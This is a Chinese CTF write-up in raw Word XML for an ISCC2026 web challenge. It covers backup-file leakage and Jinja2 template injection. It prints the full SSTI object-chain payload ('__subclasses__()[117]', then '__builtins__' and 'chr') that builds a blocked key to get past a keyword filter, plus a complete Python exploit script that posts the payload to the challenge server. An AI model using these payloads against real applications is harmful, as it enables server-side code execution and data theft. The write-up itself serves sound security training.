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ISCC2026 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p/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竞赛用户名：________    选手真实姓名：________    选手注册邮箱：________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>题目类型+题目名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Web + 企业公文套红预览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目标地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>http://39.105.213.28:49104</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>考点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>备份文件泄露、Jinja2 模板注入、对象链利用、敏感词绕过、动态拼接键名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>最终 FLAG：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ISCC{enterprise_red_doc_preview}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>解题思路（必须包含文字说明+截图）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. 被动信息收集，发现备份文件线索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访问首页时，响应头显示服务使用 Werkzeug/Python，同时存在 X-Preview-Engine: red-preview/2.0。首页 HTML 注释中泄露 index.php.bak 和 app.py.bak。继续访问 robots.txt，发现 /backup/ 目录被禁止抓取，说明备份文件大概率位于该目录下。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# 首页响应头关键字段：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Server: Werkzeug/3.1.8 Python/3.11.15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X-Preview-Engine: red-preview/2.0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首页注释：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&lt;!-- notes: index.php.bak, app.py.bak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robots.txt：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User-agent: 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Disallow: /backup/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【截图占位】首页响应头、HTML 注释和 robots.txt 中的 /backup/ 目录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2. 读取 /backup/ 下的旧源码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访问 /backup/index.php.bak 和 /backup/app.py.bak 可以拿到旧 OA 残留源码。其中 app.py.bak 的 build_doc() 返回 doc 字典，说明模板上下文中存在 doc 对象，并且其中包含 flag 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def build_doc():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'title': '关于进一步规范企业公文套红预览流程的通知',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'department': '企业信息化办公室',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'doc_no': '信办发〔2026〕12号',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'date': '2026-02-24',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'summary': '预览服务仅用于内部版式核对，正式发文前仍需复核内容与编号。',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'flag': '*+*+*+*'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【截图占位】/backup/app.py.bak 中 build_doc() 泄露 doc 字典结构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3. 通过 index.php.bak 提示确定对象链方向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index.php.bak 中的兼容提示明确提到“从空字符串对象 '' 一路往上看”，这指向 Python/Jinja 常见对象链：先从空字符串的 __class__ 找到 str，再通过 __base__ 到 object，最后通过 __subclasses__() 枚举类。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$compat_note = "输入内容一定要按照模板来，有一套模板就足够了；如果字符显示出了问题，还是按老办法从空字符串对象''一路往上看，不要投机取巧跳过步骤，按最基本的来就行。";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利用方向：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''.__class__.__base__.__subclasses__()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【截图占位】/backup/index.php.bak 中关于空字符串对象链的提示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4. 测试 /preview，确认存在模板注入与过滤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向 /preview 提交 tpl 参数后，发现 {{7}} 可以执行，说明模板会被渲染；但 {{7*7}} 会被提示“不支持的表达式”，直接包含 flag 等敏感字段也会被拦截。同时，业务字段如 doc.get('title')、doc.get('department') 可以正常读取，说明可以通过 doc.get() 取业务字典中的字段。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{{7}}                         # 可以执行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{{7*7}}                       # 不支持的表达式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{{doc.get('title')}}          # 可以读取业务字段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{{doc.get('department')}}     # 可以读取业务字段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{{doc.get('flag')}}           # 直接包含 flag 会被过滤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【截图占位】/preview 中基础模板表达式、业务字段读取和敏感词过滤对比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5. 通过对象链获得 chr，动态拼接敏感键名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继续沿对象链枚举 subclasses，在题目环境中第 117 号元素是 BuiltinBridge。读取该类 __init__.__globals__ 可以看到 __builtins__ 中暴露了 chr。这样就可以用 chr(102)+chr(108)+chr(97)+chr(103) 在运行时拼出 flag，避免请求正文中直接出现 flag 字符串。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{{''.__class__.__base__.__subclasses__()}}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{{''.__class__.__base__.__subclasses__()[117].__init__.__globals__}}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关键结果：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{'__builtins__': {'chr': &lt;built-in function chr&gt;}}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动态拼接：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chr(102)+chr(108)+chr(97)+chr(103)  =&gt;  flag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【截图占位】__subclasses__()[117] 与 __builtins__["chr"] 的回显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6. 构造最终 payload 读取 doc.get("flag")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最终 payload 的核心是先通过对象链拿到 chr，再用 chr 拼出 flag 作为 doc.get() 的键名。模板执行时等价于 {{doc.get('flag')}}，但由于请求中没有直接出现 flag 字符串，因此可以绕过敏感词过滤。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{{doc.get(''.__class__.__base__.__subclasses__()[117].__init__.__globals__['__builtins__']['chr'](102)+''.__class__.__base__.__subclasses__()[117].__init__.__globals__['__builtins__']['chr'](108)+''.__class__.__base__.__subclasses__()[117].__init__.__globals__['__builtins__']['chr'](97)+''.__class__.__base__.__subclasses__()[117].__init__.__globals__['__builtins__']['chr'](103))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【截图占位】最终 payload 提交到 /preview 后返回 ISCC{enterprise_red_doc_preview}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7. 完整利用链总结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首页响应头确认 Python/Werkzeug 预览服务，HTML 注释泄露 index.php.bak 与 app.py.bak。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robots.txt 指向 /backup/，访问备份源码。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app.py.bak 中 build_doc() 说明模板上下文存在 doc，且 doc 中有 flag 字段。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index.php.bak 提示从空字符串对象链开始枚举，定位 Jinja/Python 对象链利用方向。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/preview 可渲染模板表达式，但存在表达式白名单和敏感词过滤。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通过 __subclasses__()[117].__init__.__globals__['__builtins__']['chr'] 获取 chr。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用 chr 动态拼出 flag，作为 doc.get() 的键名读取最终 flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>最终 FLAG：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ISCC{enterprise_red_doc_preview}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Exp（如有，请粘贴完整代码，不允许截图！）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运行方式：python C:\tmp\ISCC2\WEB\4\exp.py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#!/usr/bin/env python3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# -*- coding: utf-8 -*-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html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sys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URL = "http://39.105.213.28:49104/preview"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TIMEOUT = 30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build_payload()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bridge = "''.__class__.__base__.__subclasses__()[117].__init__.__globals__['__builtins__']['chr']"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key = "+".join(f"{bridge}({ord(ch)})" for ch in "flag")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return "{{doc.get(" + key + ")}}"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main() -&gt; int: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payload = build_payload()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session = requests.Session()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session.trust_env =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 = session.post(URL, data={"tpl": payload}, timeout=TIMEOUT)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resp.raise_for_status()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except requests.RequestException as exc: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print(f"request failed: {exc}", file=sys.stderr)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match = re.search(r"&lt;pre&gt;(.*?)&lt;/pre&gt;", resp.text, re.S)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if not match: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print("failed to parse preview output", file=sys.stderr)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result = html.unescape(match.group(1)).strip()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if not re.fullmatch(r"[A-Za-z0-9_]+\{[^{}]+\}", result):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print(f"unexpected result: {result!r}", file=sys.stderr)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print(result)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return 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raise SystemExit(main())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